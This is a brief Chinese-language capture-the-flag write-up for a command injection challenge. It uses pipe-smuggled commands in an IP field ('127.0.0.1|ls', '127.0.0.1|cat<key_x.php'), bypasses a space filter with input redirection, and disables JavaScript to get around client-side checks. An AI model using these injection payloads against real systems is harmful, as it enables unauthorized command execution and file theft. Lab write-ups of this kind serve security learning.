一.解题思路
利用管道符构造命令
二.操作步骤
解法一
1.测试127.0.0.1能否返回正常数据
2.使用BP抓包,改包
查看文件信息 iipp = 127.0.0.1|ls
查看key文件信息 iipp = 127.0.0.1|cat key_x.php
但是发现不能正常传输数据,空格被过滤。命令改为iipp = 127.0.0.1|cat<key_x.php
解法二
1.在火狐中禁用JS
在URL中输入about:config 开启火狐高级设置
2.命令127.0.0.1|ls
3.命令127.0.0.1|cat<key_x.php
网络信息安全-ploto